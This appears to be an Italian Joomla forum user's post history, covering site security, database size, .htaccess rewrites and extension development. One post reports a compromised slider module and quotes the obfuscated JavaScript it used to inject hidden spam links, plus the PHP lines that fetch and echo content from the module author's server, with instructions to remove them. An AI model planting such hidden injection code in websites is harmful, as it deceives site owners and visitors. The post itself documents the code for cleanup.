Post

1

Sicurezza / Re:Attacco del pannello amministrazione

« il: 09 Apr 2013, 22:13:28 »

ciao,
io  darei un occhiata ad eventuali modifiche al file /administrator/index.php alla ricerca di js non proprio di serie
dovrebbero essere in coda al file. verifica anche tutti gli altri file index.php/html.

per il resto vedi l'articolo di maudevelop.

ciao,
marco

2

Sicurezza / Plimun Nivo spam injection -- modulo per nivo slider

« il: 09 Apr 2013, 22:09:09 »

il modulo in oggetto è stato rimosso dal jed ed è sotto investigazione per aver inserito dei link a siti 'sospetti' ad insaputa degli utenti.

il problema non riguarda nivo slider ma solo questa implementazione.

consiglio la rimozione e la sostituzione con altro slider. ulteriori info su:
http://forum.joomla.it/index.php/topic,179348.msg883946.html#msg883946

ciao a tutti,
marco

3

Gallerie di immagini / Re:Plimun Nivo Slider e' sicuro?

« il: 09 Apr 2013, 21:53:19 »

ciao a tutti.
 il problema è nella implementazione plimun che inserisce dei link di spam e non nel codice di nivoslider che è a posto.

mi sono trovato, all'interno di un sito su cui mi è stato chiesto di intervenire, un link, non gradito,  ad un sito di mutui:

Codice: [Seleziona]

<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('xxxx','xxxx','xxxx','xxxx'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>
<p class="nemonn">By DLOLLOS <a hreX="http://www.xxxxx.co.uk/" title="Payday Loan">payday loans</a></p

ovviamente ho rimosso il codice di troppo;

quick fix:
in coda al file /modules/mod_PlimunNivoSlider/tmpl/default.php eliminate le righe:

Codice: [Seleziona]

$credit=file_get_contents('http://www.plimun.com/xing.php?i='.$path);
echo $credit;

dopo di che prendetevi il tempo per cercare un nuovo slider... sempre con nivo!!

ciao a tutti,
marco

4

Articoli della community / Re:Spostare Joomla! da una sottodirectory alla root, preservando il posizionamento

« il: 06 Feb 2012, 10:37:37 »

ciao matteo,

da ciò che ho capito questo articolo non si applica alla tua situazione.

nel tuo caso J era in una subdir ma era visto come se fosse stato in root per via delle regole inserite dal provider. pertanto è sufficiente rimuovere la parte

RewriteCond %{REQUEST_URI} !^/sito
RewriteCond %{REQUEST_URI} !^/Unica
RewriteRule ^(.*)$ Unica/$1 [L]

il cui scopo è simulare il sito come fosse nella root del server.

rewritebase indicherà il percorso della subdir, per questo tipicamente va tolto o modificato: l' intervento dipende dalla configurazione del server.

per maggiori dettagli vedi anche:
http://www.joomla.it/articoli-della-community/4040-modificare-gli-url-in-htaccess-con-le-funzioni-di-modrewrite.html

in cui, mi pare, parlassi anche delle situazione tipo la tua.

ciao,
marco
 

5

Joomla! 1.5 / Re:joomla articoli + filmati in flash (swf)

« il: 02 Nov 2011, 21:09:37 »

ciao carlotta1988,
quale file index?? spero quello del template, comunque di solito i flash si inseriscono negli articoli tramite il pulsante 'inserisci modifica file multimediale' dell'editor rte.

ciao,
marco

6

Database / Re:due setquery collegate

« il: 24 Ott 2011, 20:35:13 »

SELECT 1 FROM blaaaa INNER JOIN bluuuu on blaaaa.catid = bluuuu.catid WHERE ...

restituisce un recordset solo se la categoria votata è quella attuale.

ciao,
marco

ps: visto che era un problema diverso? conviene sempre aprire un nuovo post.

7

Sicurezza / Re:Soluzione attacco SQL Injection

« il: 05 Ott 2011, 17:42:20 »

mi è venuta una curiosità.. ma visto che il ladro di queste auto è sempre lo stesso non si potrebbe segnalarlo alla polizia!?

http://www.commissariatodips.it/stanze.php?strparent=10

ciao,
marco

8

Sicurezza / Re:Soluzione attacco SQL Injection

« il: 05 Ott 2011, 17:41:30 »

guarda che anche senza nulla di quello che elenchi il sito è sicuro, basta che sia aggiornato e lo resti.

su questo mi permetto di dissentire: la storia insegna che componenti bacati e bucabili sono sempre on line 


ps: se il sistemista conosce il suo lavoro, ie se pagano il giusto e non il ragazzino, un hosting condiviso è perfettamente sicuro, magari non performante ma sicuro. ovviamente poi non puoi pretendere di spendere 9.90 all'anno dominio compreso.

ciao,
marco

9

Database / Re:Mobilejoomla e capacita' database

« il: 03 Ott 2011, 12:41:12 »

con il termine 'macchina di produzione' si indica il server che eroga il servizio ed è accessibile a tutti. il termine opposto è 'macchina di test' che indica il sistema, non necessariamente locale, usato per i test.

prima dell'installazione di un componente del genere conviene installarsi una copia della macchina di produzione su cui fare gli esperimenti necessari (sì sei ancora a tempo  ). in wiki.joomla.it trovi tante guide che ti spiegano come fare, in particolare segnalo l'ottima
http://wiki.joomla.it/index.php?title=Trasferimento_siti_web_Joomla_da_locale_a_remoto_e_viceversa
di bigham.

quanto a xampp e simili non saprei aiutarti, li odio e non li ho mai usati.

ciao,
marco

10

Database / Re:Mobilejoomla e capacita' database

« il: 02 Ott 2011, 12:25:22 »

dipende da quanto spazio usa il tuo sito. sul sito di mobile è riportato:

TeraWURFL required about 25Mb of space in database. The tables contain information about almost all mobile devices in the world (screen resolution, markup language, etc), and the size cannot be reduced (actually there is a way to install Mobile Joomla! without TeraWURFL, see below).
Some hosting packages are known to be problematic

si direbbe che servano 25mb e che l'indicazione sia prudenziale; io suggerirei di installare il tuo sito su una macchina di test e installare joomla mobile, fare un po' di esperimenti e vedere quanto spazio db è occupato.

ad ogni buon conto non avresti di certo installato un'estensione come questa direttamente sulla macchina di produzione, vero?

ciao,
marco

 

11

Joomla! 1.5 / Re:inserire compete.com

« il: 02 Ott 2011, 12:16:00 »

mi sto sbagliando io o si tratta di un sevizio erogato solo a pagamento? in tal caso non è possibile chiedere supporto in questo forum.

ciao,
marco

12

Database / Re:Ridimensionare un database mysql: è possibile?

« il: 29 Set 2011, 20:54:39 »

se il problema è questo lo risolvete in pochi minuti.

facci sapere.

ciao,
marco

13

Database / Re:Ridimensionare un database mysql: è possibile?

« il: 29 Set 2011, 16:40:47 »

a dire il vero faccio il sistemista, non l'indovino 

comunque potrebbe essere un valido candidato.

ciao,
marco

14

Database / Re:Ridimensionare un database mysql: è possibile?

« il: 29 Set 2011, 16:29:07 »

non è che avete installato qualche modulo di statistiche del traffico? se è così probabilmente avrete un megabite di sito e 135 di logs 

chiedi al tuo amico di provare a vedere se c'è una tabella da 130 mega...

ti confermo che phoca non salva le foto nel db.

ciao,
marco

15

Database / Re:Ridimensionare un database mysql: è possibile?

« il: 29 Set 2011, 15:39:25 »

ciao grunge,
 con joomla, ma più in generale con mysql, le foto non sono salvate nel db, ma direttamente nel filesystem. eliminare le fotografie non contribuirà a ridurre la dimensione del db se non per pochi kb, sempre che le immagini siano gestite tramite photogallery, altrimenti non cambia proprio niente.

tipicamente la riduzione del db si ottiene eliminando dei contenuti (articoli, prodotti obsoleti e così via), ci sarebbe da verificare anche che non esistano tabelle non usate, ma l' intervento diretto sul db è da riservare alle persone molto esperte, altrimenti corri dei bei rischi.

se stai parlando del db di una azienda la soluzione è una sola: acquistare altro spazio db o cambiare provider.

ciao,
marco

16

Database / Re:azzerare database ( ripulire ?) Carneade

« il: 27 Set 2011, 17:38:13 »

basta cancellare le tabelle. puoi usare l'interfaccia web che di solito è phpmyadmin.

ti conviene però verificare che il db sia impostato (collation) come utf8, e non come latin1 cosa che potrebbe essere se era relativo a joomla 1.0, altrimenti in futuro potresti avere problemi con i caratteri accentati od internazionali.

ciao,
marco

17

Sviluppo / Re:Codice comune su diversi componenti

« il: 26 Set 2011, 21:32:41 »

ciao,
 se i componenti sono tra loro collegati puoi inserire la libreria in un componente e caricarla dalla cartella di questo. se i componenti non hanno tra loro relazioni salva le librerie in una cartella al di sotto di libraries ed importale con jimport (vedi doc).

ps: quando parli di oggetti (OOP) ti conviene parlare di installazioni e non di istanze di joomla, altrimenti non si capisce niente...

ciao,
marco

18

Sicurezza / Re:Attacco bloccato?? Possibile modificare la data di ultima modifica ftp??

« il: 26 Set 2011, 12:21:10 »

ciao,
 quando l'attacco viene segnalato significa che è stato riconosciuto e bloccato, il problema è quando non arriva il log 

comunque è possibile variare la data di ultima modifica di un files in vari modi (ftp, php, shell).

ciao,
marco

19

Sviluppo / Re:Modifica file php componente djcatalog

« il: 23 Set 2011, 11:21:40 »

verifica di avere i permessi per modificare il file...

ciao,
marco

20

Sezione dedicata ai Server / Re:Inquietante comportamento della rete interna

« il: 23 Set 2011, 11:20:40 »

premesso che, come hai tu stesso intuito, sei OT, è una questione di risoluzione dei nomi: quindi più che la VM ti conviene riavviare bind o mettere una risoluzione statica in /etc/hosts.

ma perché non usi una VM linux con dentro tutto? ce ne sono di già pronte...

ciao,
marco